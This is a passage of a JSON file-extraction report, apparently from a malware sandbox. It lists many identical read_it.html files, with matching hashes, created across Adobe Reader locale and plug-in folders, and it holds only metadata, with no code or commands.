"file_type": "created_file", "id": "file_405", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_406", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_407", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_408", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_409", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_410", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_411", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_412", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_413", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_414", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_415", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_416", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_417", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_418", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_419", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_420", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_421", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_422", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_423", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_424", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_425", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_426", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_427", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_428", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_429", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_430", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_431", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_432", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_433", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_434", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_435", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_436", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_437", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_438", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_439", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_440", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_441", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_442", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_443", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_444", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_445", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_446", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_447", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_448", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_449", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_450", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_451", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_452", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_453", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_454", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_455", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_456", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_457", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\virtualstore\\program files 